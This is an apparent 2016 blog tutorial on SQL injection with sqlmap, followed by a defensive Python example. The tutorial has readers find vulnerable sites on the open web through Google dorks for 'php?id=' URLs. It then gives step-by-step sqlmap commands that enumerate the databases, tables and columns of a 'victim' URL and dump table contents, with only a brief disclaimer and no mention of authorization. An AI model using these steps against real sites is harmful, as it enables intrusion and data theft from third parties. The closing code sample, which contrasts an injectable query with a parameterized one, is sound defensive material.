June 13, 2016
SQL Injection Using SQLmap - [PART 1]
SQL (Structured Query Language) is the language used to manage data in a relational database management system (RDBMS); applications talk to the database by sending it specially crafted query strings. That is great for functionality, but it becomes disastrous when an application builds those strings from user input without handling it correctly: the input is then interpreted as SQL. We can exploit this using the pentesting tool SQLmap.

SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and taking over the SQL database. More information on SQLmap can be found using Google, or with the -h option.

Requirements:
- Basic understanding of SQL
- SQLmap
- Common sense

This is for educational and research purposes only! Do not attempt to violate the law with anything contained here.

Step 1: Identifying the Target

To find a possibly vulnerable site, we'll Google dork search the term "php?id=". A dork is an advanced Google search that uses operators such as "", site: and filetype: to narrow the results. A potentially vulnerable site has a URL that looks something like this: https://mytarget.com/info.php?id=1

Step 2: Database Enumeration

Now that we have found a target, let's identify the databases.
sqlmap -u $url --batch --dbs

where $url is the target URL. We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --tables -D $databasename

where $url is the victim URL and $databasename is the name of the database. With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename

where $url is the victim URL, $databasename is the name of the database, and $tablename is the name of the table.

Step 3: The Dump

Now that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablename

and sqlmap will print the rows of the table. That's it! I'll be posting again, so stay tuned!

Bonus: Here's a list of other popular Google dork queries.
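From the defender's side, the flaw the steps above rely on is the application splicing the id parameter straight into its query text. The following is an added example, not code from the original post: it uses Python's sqlite3 with a constructed in-memory table standing in for the backend of an endpoint like info.php?id=1 (the table and column names are assumed), and shows the injectable lookup next to its hardened form.

```python
import sqlite3

# Constructed sample data standing in for the rows behind info.php?id=1.
SAMPLE_ROWS = [
    (1, "alice", "alice@example.test"),
    (2, "bob", "bob@example.test"),
    (3, "carol", "carol@example.test"),
]


def make_db():
    """Build an in-memory database with an assumed 'info' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE info (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO info VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, id_param):
    """The injectable pattern: the id parameter is pasted into the query text,
    so the database cannot tell data from SQL."""
    query = f"SELECT id, username, email FROM info WHERE id = {id_param}"
    return conn.execute(query).fetchall()


def safe_lookup(conn, id_param):
    """Hardened version: validate the type first, then bind the value as a
    parameter so the database only ever sees it as data, never as SQL."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []  # anything that is not an integer id is rejected outright
    return conn.execute(
        "SELECT id, username, email FROM info WHERE id = ?", (id_value,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tamper = "1 OR 1=1"  # constructed value of the kind a scanner sends instead of id=1
    print(vulnerable_lookup(db, "1"))     # the one intended row
    print(vulnerable_lookup(db, tamper))  # every row: the flaw sqlmap finds and exploits
    print(safe_lookup(db, tamper))        # []: rejected before it reaches the database
```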